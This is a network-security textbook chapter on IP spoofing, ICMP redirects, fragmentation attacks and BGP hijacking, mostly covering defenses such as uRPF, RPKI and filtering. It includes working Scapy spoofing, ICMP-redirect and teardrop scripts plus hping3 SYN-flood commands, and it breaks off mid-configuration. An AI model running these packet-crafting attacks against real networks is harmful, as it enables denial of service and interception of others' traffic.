Network Layer Vulnerabilities
IP spoofing, ICMP attacks, BGP hijacking, IPv6 vulnerabilities, and network layer defense strategies
Chapter 3: Network Layer Vulnerabilities
The Day YouTube Disappeared
On February 24, 2008, YouTube vanished from the internet: not due to server failure, but because of a routing misconfiguration in Pakistan.
The Pakistani government had ordered ISPs to block YouTube within the country. Pakistan Telecom (AS17557) attempted to comply by creating an internal BGP route for YouTube's IP space (208.65.153.0/24). But they made a critical error: this route was advertised to upstream provider PCCW, which propagated it globally.
Within minutes, traffic destined for YouTube was being routed to Pakistan, and into a black hole. The route was more specific (/24) than YouTube's legitimate announcement (/22), so BGP's longest-prefix-match rule preferred the fake route. YouTube was unreachable worldwide for nearly two hours.
This incident exposed a fundamental vulnerability: BGP, the protocol that routes all internet traffic, operates on trust. Any network can announce any IP prefix, and others will believe it. This chapter explores network layer vulnerabilities, from IP spoofing to BGP hijacking, and the defenses being developed to address them.
Network Layer Attack Surface
The network layer (Layer 3) handles addressing and routing, getting packets from source to destination across multiple networks. Its core protocols, designed in an era of implicit trust, contain significant security weaknesses:
Network Layer Attack Surface:
```
                    +-------------------------------------------+
                    |              INTERNET ROUTING             |
                    |  +-------------------------------------+  |
                    |  | BGP: Trust-based, no authentication |  |
                    |  |   -> Hijacking, leaks, de-peering   |  |
                    |  +-------------------------------------+  |
                    +---------------------+---------------------+
                                          |
  +---------------------------------------+---------------------------------------+
  |                                       |                                       |
  |  +---------------------+  +-----------+---------+  +---------------------+    |
  |  |    IP PROTOCOL      |  |    ICMP PROTOCOL    |  |    IPv6 SPECIFIC    |    |
  |  |                     |  |                     |  |                     |    |
  |  | * No source auth    |  | * Network recon     |  | * Extension headers |    |
  |  | * Easy to spoof     |  | * Redirect attacks  |  | * NDP spoofing      |    |
  |  | * Fragment attacks  |  | * DoS amplification |  | * Tunneling abuse   |    |
  |  +---------------------+  +---------------------+  +---------------------+    |
  +-----------------------------------------------------------------------------+
```
MITRE ATT&CK Reference
Network layer attacks map to several ATT&CK techniques:
- T1090 - Proxy/Connection Proxy
- T1090.002 - External Proxy (BGP manipulation)
- T1557 - Adversary-in-the-Middle
- T1498 - Network Denial of Service
- T1496 - Resource Hijacking
IP Address Spoofing
Attack Overview
IP spoofing involves forging the source IP address in packet headers. Since IP provides no authentication mechanism, any sender can claim any source address.
IP Spoofing Concept:
```
LEGITIMATE PACKET:
+----------------------------------------------------------------+
|  IP Header                                                     |
|  +-------------------+   +-------------------+                 |
|  | Source: 1.1.1.1   |   | Dest: 2.2.2.2     |                 |
|  | (Real sender)     |   | (Real target)     |                 |
|  +-------------------+   +-------------------+                 |
+----------------------------------------------------------------+

SPOOFED PACKET:
+----------------------------------------------------------------+
|  IP Header                                                     |
|  +-------------------+   +-------------------+                 |
|  | Source: 3.3.3.3   |   | Dest: 2.2.2.2     |                 |
|  | (FORGED!)         |   | (Real target)     |                 |
|  +-------------------+   +-------------------+                 |
+----------------------------------------------------------------+

Attacker (1.1.1.1) claims to be 3.3.3.3
```
Use Cases for Spoofing
IP spoofing enables several attack types:
| Use Case | Description | Bidirectional Needed? |
|---|---|---|
| Reflection/Amplification DDoS | Spoof victim as source, send to amplifiers | No |
| Bypassing IP-based access controls | Pretend to be trusted source | No (but limited use) |
| TCP session hijacking | Inject packets into existing connection | Blind (one-way) |
| SYN floods | Exhaust target resources with fake connections | No |
| Anonymizing attacks | Hide true origin of attack traffic | No |
Practical Implementation
Using Scapy (Python):
```python
#!/usr/bin/env python3
"""
IP Spoofing Demonstration - AUTHORIZED USE ONLY
Shows how to craft packets with arbitrary source IP
"""
from scapy.all import IP, ICMP, TCP, send
import argparse


def spoof_icmp(target, spoofed_source):
    """
    Send ICMP echo request with spoofed source IP
    Response will go to spoofed_source, not us
    """
    packet = IP(src=spoofed_source, dst=target) / ICMP()
    print(f"[*] Sending spoofed ICMP to {target}")
    print(f"[*] Spoofed source: {spoofed_source}")
    print(f"[*] Reply will go to {spoofed_source}, not to us")
    send(packet, verbose=True)


def spoof_syn(target, target_port, spoofed_source):
    """
    Send TCP SYN with spoofed source (SYN flood component)
    """
    packet = (
        IP(src=spoofed_source, dst=target) /
        TCP(sport=12345, dport=target_port, flags='S', seq=1000)
    )
    print(f"[*] Sending spoofed SYN to {target}:{target_port}")
    print(f"[*] Spoofed source: {spoofed_source}")
    send(packet, verbose=True)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="IP Spoofing Demo")
    parser.add_argument("target", help="Target IP")
    parser.add_argument("spoofed", help="IP to spoof as source")
    parser.add_argument("-p", "--port", type=int, default=80, help="Target port")
    parser.add_argument("-t", "--type", choices=['icmp', 'syn'], default='icmp')
    args = parser.parse_args()

    print("[!] IP Spoofing - Educational Use Only!")
    print("[!] Only use on networks you own or have authorization to test\n")

    if args.type == 'icmp':
        spoof_icmp(args.target, args.spoofed)
    else:
        spoof_syn(args.target, args.port, args.spoofed)
```
Using hping3:
```bash
# Spoofed ICMP ping - reply goes to spoofed source
sudo hping3 -1 -a 10.0.0.100 192.168.1.1
# -1 = ICMP, -a = spoof source address

# Spoofed SYN flood
sudo hping3 -S -a 10.0.0.100 -p 80 --flood 192.168.1.1
# -S = SYN flag, --flood = fast as possible

# Random source addresses for each packet
sudo hping3 -S --rand-source -p 80 --flood 192.168.1.1
```
Detection
Network-Level Detection:
```
# Look for impossible source addresses arriving on the external interface:
# RFC 1918 space, loopback, broadcast, or your own prefixes ("martians")

# Cisco IOS - count martian packets the router has seen
show ip traffic | include martian
```
IDS/Firewall Rules:
```
# Snort/Suricata - packets that claim an internal (HOME_NET) source but are
# seen by a sensor on the external side of the firewall. The rule is only
# meaningful on that external sensor; inside the network the same traffic
# is normal.
alert ip $HOME_NET any -> $HOME_NET any (msg:"Spoofed Internal IP from External"; \
    threshold:type limit, track by_src, count 1, seconds 60; \
    sid:1000010; rev:1;)

# Detection indicators:
# - Internal IPs from external interface
# - Broadcast addresses as source
# - Loopback addresses externally
# - Destination as source
```
Mitigation
Ingress/Egress Filtering (BCP 38/RFC 2827):
Ingress Filtering - ISP Edge Router:
```
              Internet
                 |
        +--------+---------+
        |    ISP Router    |
        |                  |
        | IF source NOT in |
        | customer's block |
        | THEN drop        |
        +--------+---------+
                 |
    Customer Network (10.1.0.0/16)

Only packets with source 10.1.0.0/16 allowed OUT
Prevents customer from spoofing other addresses
```
Cisco IOS Configuration:
```
! Ingress filtering on customer-facing interface
interface GigabitEthernet0/1
 description Customer Connection
 ip address 10.1.0.1 255.255.255.0
 ! Only allow sources from customer's network
 ip verify unicast source reachable-via rx
 ! Or explicit ACL
 ip access-group ANTISPOOFING in

! ACL for anti-spoofing
ip access-list extended ANTISPOOFING
 permit ip 10.1.0.0 0.0.255.255 any
 deny ip any any log
```
uRPF (Unicast Reverse Path Forwarding):
```
! Enable uRPF on external interfaces
interface GigabitEthernet0/0
 ip verify unicast source reachable-via rx
 ! rx  = strict mode (packet must arrive on interface with route to source)
 ! any = loose mode (route to source must exist somewhere)
```
PRO TIP
Strict uRPF can break asymmetric routing. Use loose mode in complex topologies and strict mode at network edges where routing is predictable.
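To make the detection indicators and the two uRPF modes concrete, here is an added example (not from the chapter, and not vendor code) that models the BCP 38 and uRPF decisions of the ISP edge router in the diagram as plain Python. The forwarding table, interface names (`Gi0/0` upstream, `Gi0/1` and `Gi0/2` customers) and packet records are all constructed for the example; the martian list is illustrative rather than a complete bogon list.

```python
"""
Added example (not from the chapter): a software model of the BCP 38 / uRPF
checks described above, run over constructed packet records. The FIB,
interface names and packets are all made up for the example.
"""
import ipaddress

# Address ranges that must never be seen as a source on the Internet-facing
# interface (RFC 1918 space, loopback, link-local, multicast, "this" network).
# Illustrative, not a complete bogon list.
MARTIANS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]

UPSTREAM_IF = "Gi0/0"

# Constructed forwarding table of the ISP edge router in the diagram:
# prefix -> interface the router would use to reach that prefix.
FIB = {
    ipaddress.ip_network("0.0.0.0/0"):       "Gi0/0",  # default route to upstream
    ipaddress.ip_network("203.0.113.0/24"):  "Gi0/0",  # a peer's block
    ipaddress.ip_network("10.1.0.0/16"):     "Gi0/1",  # customer block from the diagram
    ipaddress.ip_network("198.51.100.0/24"): "Gi0/2",  # a second customer
}


def is_martian(src):
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in MARTIANS)


def lookup(src):
    """Longest-prefix match on the source address: (prefix, egress) or None."""
    addr = ipaddress.ip_address(src)
    matches = [(net, ifc) for net, ifc in FIB.items() if addr in net]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0].prefixlen)


def urpf_passes(src, ingress, mode="strict", allow_default=False):
    """
    strict: the reverse route must point back out the ingress interface.
    loose:  a reverse route merely has to exist.
    The default route satisfies neither unless allow_default is set, which
    matches the usual router behaviour.
    """
    route = lookup(src)
    if route is None:
        return False
    prefix, egress = route
    if prefix.prefixlen == 0 and not allow_default:
        return False
    if mode == "loose":
        return True
    return egress == ingress


def evaluate(pkt, mode="strict", allow_default=False):
    """Return 'accept' or 'drop:<reason>' for one packet record."""
    if pkt["ingress"] == UPSTREAM_IF and is_martian(pkt["src"]):
        return "drop:martian"
    if not urpf_passes(pkt["src"], pkt["ingress"], mode, allow_default):
        return "drop:urpf-" + mode
    return "accept"


# Constructed packet records: what the edge router sees on each interface.
SAMPLE = [
    {"src": "10.1.5.9",     "ingress": "Gi0/1"},  # customer using its own block
    {"src": "198.51.100.7", "ingress": "Gi0/1"},  # customer spoofing another customer
    {"src": "192.168.1.1",  "ingress": "Gi0/0"},  # RFC 1918 source from the Internet
    {"src": "203.0.113.5",  "ingress": "Gi0/0"},  # legitimate peer traffic
    {"src": "8.8.8.8",      "ingress": "Gi0/0"},  # only the default route covers it
]


def run(mode="strict", allow_default=False):
    return [evaluate(p, mode, allow_default) for p in SAMPLE]


if __name__ == "__main__":
    for mode in ("strict", "loose"):
        print(mode, run(mode, allow_default=True))
```

The last sample packet is the point of the pro tip: on the upstream interface only the default route covers most of the Internet, so strict uRPF without `allow_default` drops everything there, while on the customer-facing interfaces strict mode works exactly as BCP 38 intends and catches the customer spoofing another customer's block.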
ICMP Attacks
ICMP Attack Categories
ICMP (Internet Control Message Protocol) provides essential network functions but can be abused for reconnaissance, denial of service, and redirection attacks.
ICMP Attack Types:
| Category | Attack | ICMP Type |
|---|---|---|
| Reconnaissance | Host discovery | Type 8 (Echo Request) |
| Reconnaissance | Path discovery | Type 11 (Time Exceeded) |
| Reconnaissance | OS fingerprinting | Various responses |
| Denial of Service | Ping of Death | Oversized Type 8 |
| Denial of Service | Smurf attack | Broadcast Type 8 |
| Denial of Service | ICMP flood | Type 8 flood |
| Redirection | ICMP Redirect | Type 5 (Redirect) |
| Redirection | Route manipulation | Type 5, codes 0-3 |
| Covert Channel | Data exfiltration | Type 0/8 (payload) |
| Covert Channel | C2 communication | Any type (encoding) |
ICMP Redirect Attack
ICMP Redirect tells a host to use a different gateway for a specific destination. An attacker can use this to redirect traffic.
ICMP Redirect Attack:
```
NORMAL ROUTING:
  Victim --------> Gateway --------> Internet --------> Server
  (10.0.0.100)     (10.0.0.1)                           (1.2.3.4)

ATTACK:
  1. Attacker sends ICMP Redirect:
     "For 1.2.3.4, use gateway 10.0.0.50" (attacker's IP)
  2. Victim updates routing table
  3. NEW PATH:
  Victim --------> Attacker --------> Gateway --------> Server
  (10.0.0.100)     (10.0.0.50)        (10.0.0.1)        (1.2.3.4)
                   (MITM!)
```
Using Scapy:
```python
#!/usr/bin/env python3
"""
ICMP Redirect Attack - AUTHORIZED USE ONLY
Redirects victim's traffic through attacker
"""
from scapy.all import IP, ICMP, send


def icmp_redirect(victim_ip, target_dst, fake_gateway, real_gateway):
    """
    Send ICMP redirect to victim

    Args:
        victim_ip:    IP of machine to redirect
        target_dst:   Destination IP to redirect
        fake_gateway: Gateway to use (attacker)
        real_gateway: Appears to come from real gateway
    """
    # ICMP Redirect packet
    # Type 5, Code 1 = Redirect for Host
    packet = (
        IP(src=real_gateway, dst=victim_ip) /
        ICMP(type=5, code=1, gw=fake_gateway) /
        IP(src=victim_ip, dst=target_dst)  # Original packet header
    )
    print(f"[*] Sending ICMP Redirect to {victim_ip}")
    print(f"[*] Redirecting traffic for {target_dst} via {fake_gateway}")
    send(packet, verbose=True)


if __name__ == "__main__":
    print("[!] ICMP Redirect Attack - Educational Use Only!")
    print("[!] Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward")
    # Example: Redirect victim's traffic to server.com through us
    # icmp_redirect("192.168.1.100", "93.184.216.34", "192.168.1.50", "192.168.1.1")
```
Smurf Attack (Historical)
The Smurf attack used broadcast amplification to overwhelm targets. While largely mitigated, understanding it illustrates amplification principles.
Smurf Attack Flow:
```
1. Attacker sends ICMP Echo Request to broadcast address
   Source IP   = Victim's IP (SPOOFED)
   Destination = 10.0.0.255 (broadcast)

2. Every host on network responds to victim

   Attacker -------> Broadcast Network -------> Victim
   (spoofed src)         100 hosts             100 replies!
                          respond

Amplification factor = number of hosts on broadcast network
```
Detection and Mitigation
Disable ICMP Redirect Acceptance:
```bash
# Linux - Disable ICMP redirects (runtime)
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

# Permanent (/etc/sysctl.conf)
# net.ipv4.conf.all.accept_redirects = 0
# net.ipv4.conf.default.accept_redirects = 0
# net.ipv4.conf.all.send_redirects = 0
```
Router Configuration:
```
! Cisco IOS - Disable ICMP redirects
interface GigabitEthernet0/0
 no ip redirects

! Rate limit ICMP unreachables (one per 500 ms)
ip icmp rate-limit unreachable 500
```
Firewall Rules:
```bash
# iptables - Block ICMP redirects
iptables -A INPUT -p icmp --icmp-type redirect -j DROP
iptables -A OUTPUT -p icmp --icmp-type redirect -j DROP

# Rate limit ping
iptables -A INPUT -p icmp --icmp-type echo-request \
    -m limit --limit 1/s --limit-burst 4 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
```
IP Fragmentation Attacks
Overview
IP fragmentation allows large packets to be split for transmission across networks with smaller MTUs. Attackers can abuse this for evasion and denial of service.
IP Fragment Structure:
```
Original Packet (4000 bytes):
+-----------+---------------------------------------------------+
| IP Header |                        Data                       |
|    20B    |                       3980B                       |
+-----------+---------------------------------------------------+

Fragmented (MTU 1500):
 Fragment 1:             Fragment 2:             Fragment 3:
+------+--------------+ +-------+-------------+ +-------+------+
|IP Hdr|     Data     | |IP Hdr |    Data     | |IP Hdr | Data |
|MF=1  |    1480B     | |MF=1   |   1480B     | |MF=0   |1020B |
|Off=0 |              | |Off=185|             | |Off=370|      |
+------+--------------+ +-------+-------------+ +-------+------+

MF  = More Fragments flag
Off = Fragment Offset (in 8-byte units)
```
Fragmentation Attack Types
Teardrop Attack (Historical): Overlapping fragments cause crash during reassembly.
```python
from scapy.all import IP, send


def teardrop(target):
    """
    Teardrop - overlapping fragments (historical, mostly patched)
    Both fragments carry the same IP id so the receiver groups them into
    one datagram during reassembly.
    """
    # First fragment: bytes 0-99, more fragments to follow
    frag1 = IP(dst=target, id=1234, flags='MF', frag=0) / ('X' * 100)
    # Second (last) fragment: offset 8 * 8 = 64 bytes, so it overlaps
    # bytes 64-99 of the first fragment
    frag2 = IP(dst=target, id=1234, frag=8) / ('Y' * 100)  # Overlaps!
    send(frag1)
    send(frag2)
```
Tiny Fragment Attack: TCP header split across fragments to evade firewalls.
Tiny Fragment Attack:
```
Normal TCP Packet:
+-----------------+------------------+----------------------------+
| IP Header (20B) | TCP Header (20B) |            Data            |
|                 | Src Port: 12345  |                            |
|                 | Dst Port: 80     |                            |
|                 | Flags: SYN       |                            |
+-----------------+------------------+----------------------------+
                          ^
                 Firewall checks this and blocks if needed

Tiny Fragment Attack:
 Fragment 1 (24 bytes):          Fragment 2:
+-----------+---------------+   +------------+------------------+
| IP Header | TCP (4 bytes) |   | IP Header  | TCP (16B) + Data |
| MF=1      | Src Port only |   | Frag offset| DST PORT + flags |
| Frag=0    |               |   |            |                  |
+-----------+---------------+   +------------+------------------+
                  ^
      Firewall can't see dst port/flags!
      May allow through for reassembly
```
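The two abuses above, overlapping fragments and a first fragment too small to carry the TCP header, are both visible to anything that reassembles before inspecting. The following is an added example (not from the chapter, not a vendor implementation) of the reassembly-side checks a firewall or IDS applies: it records the byte range each fragment claims, reports ranges claimed twice, and flags TCP first fragments shorter than a full header as well as the RFC 3128 offset-1 case. The fragment records and the 20-byte minimum are constructed for the example; offsets are in 8-byte units as on the wire.

```python
"""
Added example (not from the chapter): reassembly-side checks that catch the
two fragmentation abuses described above, overlapping fragments (Teardrop)
and a first fragment too small to hold the TCP header (tiny fragment). The
fragment records below are constructed; offsets are in 8-byte units as on
the wire.
"""
from dataclasses import dataclass

# Policy choice for this example: a first fragment carrying TCP must hold the
# full 20-byte fixed header so ports and flags can be inspected.
MIN_FIRST_TCP = 20


@dataclass
class Fragment:
    ip_id: int
    offset: int      # Fragment Offset field (8-byte units)
    mf: bool         # More Fragments flag
    length: int      # payload bytes carried by this fragment
    proto: str = "tcp"

    @property
    def start(self):
        return self.offset * 8

    @property
    def end(self):
        return self.start + self.length


def find_overlaps(frags):
    """Report byte ranges claimed by more than one fragment of the same datagram."""
    findings = []
    by_id = {}
    for f in frags:
        by_id.setdefault(f.ip_id, []).append(f)
    for ip_id, group in by_id.items():
        reach = 0  # highest byte already covered by earlier fragments
        for f in sorted(group, key=lambda x: x.start):
            if f.start < reach:
                findings.append(f"overlap id={ip_id} bytes {f.start}-{min(reach, f.end)}")
            reach = max(reach, f.end)
    return findings


def find_tiny_fragments(frags):
    """RFC 1858 / RFC 3128 style checks on TCP fragments."""
    findings = []
    for f in frags:
        if f.proto != "tcp":
            continue
        if f.offset == 0 and f.mf and f.length < MIN_FIRST_TCP:
            findings.append(f"tiny-first-fragment id={f.ip_id} only {f.length} header bytes")
        if f.offset == 1:
            # an offset-1 fragment lands on bytes 8-15 of the TCP header and
            # can overwrite the flags of an already accepted first fragment
            findings.append(f"offset-1-fragment id={f.ip_id} (RFC 3128)")
    return findings


def analyze(frags):
    return find_overlaps(frags) + find_tiny_fragments(frags)


# Constructed samples
NORMAL = [    # the 4000-byte datagram from the diagram, MTU 1500
    Fragment(7, 0, True, 1480),
    Fragment(7, 185, True, 1480),
    Fragment(7, 370, False, 1020),
]
TEARDROP = [  # second fragment starts 64 bytes in, inside the first
    Fragment(1, 0, True, 100),
    Fragment(1, 8, False, 100),
]
TINY = [      # 8 bytes of TCP header first (ports only); flags arrive later
    Fragment(2, 0, True, 8),
    Fragment(2, 1, False, 40),
]

if __name__ == "__main__":
    for name, frags in (("normal", NORMAL), ("teardrop", TEARDROP), ("tiny", TINY)):
        print(name, analyze(frags) or "clean")
```

Dropping on these findings is what a "reassemble before inspection" device does implicitly; the value of spelling the checks out is seeing that the legitimate three-fragment datagram from the diagram produces no finding at all, so the policy does not have to block fragments wholesale.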
Mitigation
```
! Cisco IOS - Block non-initial fragments
! (the "fragments" keyword matches fragments with a non-zero offset)
access-list 101 deny ip any any fragments
! Note: May impact legitimate traffic

! Better: Virtual Fragment Reassembly (configured per interface)
ip virtual-reassembly

! Modern approach: Stateful inspection
! Reassemble before inspection
```
Linux:
```bash
# Tune fragment handling
echo 30 > /proc/sys/net/ipv4/ipfrag_time              # Reassembly timeout (seconds)
echo 4194304 > /proc/sys/net/ipv4/ipfrag_high_thresh  # Max memory for fragment queues (bytes)

# Drop non-initial fragments with iptables (-f matches second and later fragments)
iptables -A INPUT -f -j DROP
```
BGP Hijacking
Attack Overview
BGP hijacking occurs when a network announces IP prefixes it doesn't own, causing traffic to be misrouted globally. This can be accidental (misconfiguration) or malicious (interception, DoS).
BGP Hijacking Types:
```
TYPE 1: PREFIX HIJACK (Exact Match)
-----------------------------------
  Legitimate: AS100 announces 192.0.2.0/24
  Attacker:   AS666 announces 192.0.2.0/24
  Result:     Traffic split based on AS path length
              Some routes prefer attacker's announcement

TYPE 2: SUB-PREFIX HIJACK (More Specific)
-----------------------------------------
  Legitimate: AS100 announces 192.0.2.0/24
  Attacker:   AS666 announces 192.0.2.0/25 (more specific!)
  Result:     Longest prefix match -> ALL traffic to attacker
              This is what happened to YouTube

TYPE 3: AS PATH MANIPULATION
----------------------------
  Legitimate: AS100 -> AS200 -> 192.0.2.0/24 (path length 2)
  Attacker:   AS666 -> 192.0.2.0/24 (path length 1)
  Result:     Shorter path wins, traffic to attacker
```
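The three types reduce to two rules a router applies in order: longest-prefix match chooses which prefix a destination falls under, and only then does the decision process (here simplified to shortest AS_PATH) choose among announcements of that prefix. The following is an added example (not from the chapter) of a toy RIB that applies exactly those two rules, run over the chapter's AS100/AS200/AS666 scenarios and the 2008 YouTube leak. It reuses the chapter's prefixes and AS17557; 64500 and 64496 are private-range placeholder ASNs standing in for YouTube's origin and for Pakistan Telecom's upstream, which the chapter names but does not number. Real BGP has many more tie-breakers (local preference, MED, IGP cost) that are deliberately left out.

```python
"""
Added example (not from the chapter): a toy BGP RIB applying the two rules
the hijack types above depend on, longest-prefix match between prefixes and
shortest AS_PATH between competing announcements of one prefix.
"""
import ipaddress
from collections import defaultdict


class Rib:
    def __init__(self):
        # prefix -> list of AS paths as seen by this router; the last AS in a
        # path is the origin that announced the prefix
        self.routes = defaultdict(list)

    def announce(self, prefix, as_path):
        self.routes[ipaddress.ip_network(prefix)].append(tuple(as_path))

    def best_path(self, prefix):
        # shortest AS_PATH wins; ties broken on the path tuple for determinism
        return min(self.routes[prefix], key=lambda p: (len(p), p))

    def lookup(self, dst):
        """Return (prefix, as_path, origin_as) used to forward traffic to dst."""
        addr = ipaddress.ip_address(dst)
        covering = [p for p in self.routes if addr in p]
        if not covering:
            return None
        prefix = max(covering, key=lambda p: p.prefixlen)  # longest prefix match
        path = self.best_path(prefix)
        return prefix, path, path[-1]


def origin_for(rib, dst):
    return rib.lookup(dst)[2]


def exact_match_and_path_hijack():
    """Types 1 and 3: same prefix, the shorter AS_PATH is preferred."""
    rib = Rib()
    rib.announce("192.0.2.0/24", [200, 100])  # legitimate, reached via transit AS200
    rib.announce("192.0.2.0/24", [666])       # attacker, directly peered with us
    return origin_for(rib, "192.0.2.10")


def subprefix_hijack():
    """Type 2: the more specific prefix wins even behind a longer AS_PATH."""
    rib = Rib()
    rib.announce("192.0.2.0/24", [100])
    rib.announce("192.0.2.0/25", [300, 400, 666])
    # hosts in the /25 go to the attacker, hosts outside it still reach AS100
    return origin_for(rib, "192.0.2.10"), origin_for(rib, "192.0.2.200")


def youtube_2008():
    """The covering /22 keeps its origin; the leaked /24 captures its hosts."""
    rib = Rib()
    rib.announce("208.65.152.0/22", [64500])         # YouTube's aggregate (placeholder origin ASN)
    rib.announce("208.65.153.0/24", [64496, 17557])  # leak, via placeholder upstream ASN
    return origin_for(rib, "208.65.153.100"), origin_for(rib, "208.65.154.1")


if __name__ == "__main__":
    print("exact/path:", exact_match_and_path_hijack())
    print("sub-prefix:", subprefix_hijack())
    print("youtube:   ", youtube_2008())
```

The sub-prefix case is the one worth dwelling on: the attacker's path is three hops long against the legitimate single hop, and it still wins for every host inside the /25, because path length is never compared across different prefixes. That is why the monitoring and RPKI sections below treat an unexpected more-specific announcement as the primary alarm.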
Real-World BGP Incidents
| Year | Date | Incident | Impact |
|---|---|---|---|
| 2008 | Feb 24 | Pakistan Telecom (AS17557) / YouTube | Global YouTube outage (~2 hours). Pakistan government ordered YouTube block; route leaked to PCCW, propagated globally. |
| 2010 | Apr 8 | China Telecom (AS4134) | ~37,000 prefixes (15% of routes) hijacked for 18 minutes. Affected U.S. government, military, and commercial sites. |
| 2017 | Dec 12 | Rostelecom (AS12389) / Russia | Traffic for Google, Apple, Facebook, Microsoft, and ~80 prefixes routed through Russia for 12 minutes. |
| 2018 | Apr 24 | eNet (AS10297) / Amazon Route53 | DNS traffic hijacked to steal ~$150,000 in Ethereum from MyEtherWallet users. |
| 2019 | Jun 6 | China Telecom (AS4134) / European ISPs | Traffic from Swisscom, KPN, Bouygues Telecom routed through China for over 2 hours. |
| 2022 | Mar 28 | RTComm (AS8342) / Twitter, Russia | Twitter prefixes briefly announced during Russia-Ukraine conflict, part of broader network interference. |
BGP Interception (vs Hijacking)
Smart attackers maintain connectivity while intercepting:
BGP Interception Flow:
```
SIMPLE HIJACK (Traffic blackholed):
  User ----> (AS666 announces prefix) ----> Blackhole
  Traffic never reaches real destination

INTERCEPTION (Traffic forwarded):
  User ----> AS666 ----> AS123 ----> Legitimate AS100
              |                           ^
              +-- Attacker inspects ------+
                  and forwards

How to maintain path to legitimate AS:
  1. Announce to most peers
  2. Don't announce to path toward legitimate AS
  3. Traffic still routes to legitimate AS from attacker
  4. Attacker can inspect/modify in transit
```
Detection
BGP Monitoring Tools:
| Tool | Description | URL |
|---|---|---|
| RIPE RIS | Real-time BGP data | ris.ripe.net |
| BGPStream | Historical BGP data | bgpstream.com |
| Cloudflare Radar | BGP anomaly detection | radar.cloudflare.com |
| ThousandEyes | Commercial monitoring | thousandeyes.com |
| BGPalerter | Open source alerting | github.com/nttgin/BGPalerter |
Setting Up Monitoring:
```bash
# Install BGPalerter
npm install -g bgpalerter

# Configure prefixes to monitor (prefixes.yml)

# Run monitoring
bgpalerter

# Example alert:
# ALERT: More specific prefix announced
#   Your prefix: 203.0.113.0/24
#   Hijacker:    203.0.113.0/25 from AS666
```
Mitigation: RPKI
Resource Public Key Infrastructure (RPKI) cryptographically validates BGP route origins.
RPKI Overview:
```
WITHOUT RPKI:
  Any AS can announce any prefix
  BGP routers blindly trust announcements

WITH RPKI:
  1. Prefix owner creates ROA (Route Origin Authorization)
     "AS100 is authorized to announce 192.0.2.0/24"
  2. ROA signed with owner's RPKI certificate
  3. BGP routers validate announcements against ROAs:
     - VALID:     ROA exists, AS matches
     - INVALID:   ROA exists, AS doesn't match -> DROP
     - NOT FOUND: No ROA (legacy, typically accept)

+-----------------------------------------------------------------+
|                         ROA Validation                          |
|                                                                 |
|  Announcement: AS666 -> 192.0.2.0/24                            |
|  ROA says:     AS100 authorized for 192.0.2.0/24                |
|  Result:       INVALID -> Route rejected                        |
+-----------------------------------------------------------------+
```
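The three validation states are defined by RFC 6811, and one detail the overview above leaves implicit matters in practice: a ROA carries a maxLength, so an announcement from the correct origin AS is still INVALID if it is more specific than the ROA allows. The following is an added example (not from the chapter, not router code) that implements that validation and the drop-invalid policy over a constructed ROA set and announcement list; 64500 is a placeholder ASN for YouTube's origin, the other numbers are the chapter's own.

```python
"""
Added example (not from the chapter): RFC 6811 route origin validation
against a constructed set of ROAs, returning VALID / INVALID / NOT_FOUND and
applying a drop-invalid policy. ROAs and announcements are made up; 64500 is
a placeholder ASN standing in for YouTube's origin.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Roa:
    prefix: ipaddress.IPv4Network
    max_length: int   # longest prefix the origin may announce under this ROA
    origin_as: int


def roa(prefix, origin_as, max_length=None):
    net = ipaddress.ip_network(prefix)
    return Roa(net, net.prefixlen if max_length is None else max_length, origin_as)


def validate(prefix, origin_as, roas):
    """Return 'VALID', 'INVALID' or 'NOT_FOUND' for one announcement."""
    net = ipaddress.ip_network(prefix)
    covering = [r for r in roas if net.subnet_of(r.prefix)]
    if not covering:
        return "NOT_FOUND"   # no ROA covers this space: legacy, usually accepted
    for r in covering:
        if r.origin_as == origin_as and net.prefixlen <= r.max_length:
            return "VALID"
    return "INVALID"         # covered by a ROA, but wrong origin or too specific


def apply_policy(announcements, roas, drop_invalid=True):
    """Mimic 'if validation-state is invalid then drop': (prefix, as, state, action) rows."""
    rows = []
    for prefix, origin_as in announcements:
        state = validate(prefix, origin_as, roas)
        action = "drop" if (state == "INVALID" and drop_invalid) else "accept"
        rows.append((prefix, origin_as, state, action))
    return rows


# Constructed ROAs
ROAS = [
    roa("192.0.2.0/24", 100),        # AS100 may announce exactly the /24 (maxLength 24)
    roa("208.65.152.0/22", 64500),   # placeholder for YouTube's aggregate
]

# Constructed announcements seen by a validating router
ANNOUNCEMENTS = [
    ("192.0.2.0/24", 100),       # legitimate
    ("192.0.2.0/24", 666),       # exact-match hijack
    ("192.0.2.0/25", 100),       # right AS, but more specific than maxLength
    ("198.51.100.0/24", 300),    # no ROA at all
    ("208.65.153.0/24", 17557),  # the 2008 YouTube leak
]


def states():
    return [row[2] for row in apply_policy(ANNOUNCEMENTS, ROAS)]


if __name__ == "__main__":
    for row in apply_policy(ANNOUNCEMENTS, ROAS):
        print(row)
```

Two consequences fall out of the sample run. The YouTube /24 is INVALID under a ROA for the covering /22 even though no ROA mentions the /24 itself, which is precisely the sub-prefix case RPKI was built for. And the NOT_FOUND announcement is accepted, so origin validation protects only the prefixes whose holders have published ROAs; it also says nothing about the rest of the AS path, which is why prefix filters and maximum-prefix limits remain in the next section.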
Configuring RPKI Validation (Cisco IOS-XR):
```
! Define the policy first: IOS-XR rejects a reference to a policy that does
! not exist yet
route-policy RPKI-VALIDATION
  if validation-state is invalid then
    drop
  endif
  pass
end-policy
!
! Configure RPKI cache server connection (RTR protocol)
router bgp 65001
 rpki server 192.0.2.10
  transport tcp port 3323
  refresh-time 60
 !
 ! Mark routes with their validation state
 address-family ipv4 unicast
  bgp origin-as validation signal-ibgp
 !
 ! Drop invalid routes from this neighbor
 neighbor 10.0.0.1
  address-family ipv4 unicast
   route-policy RPKI-VALIDATION in
```
Additional BGP Security
Prefix Filtering:
```
! Accept only expected prefixes from customer
ip prefix-list CUSTOMER-PREFIXES permit 203.0.113.0/24
!
route-map CUSTOMER-IN permit 10
 match ip address prefix-list CUSTOMER-PREFIXES
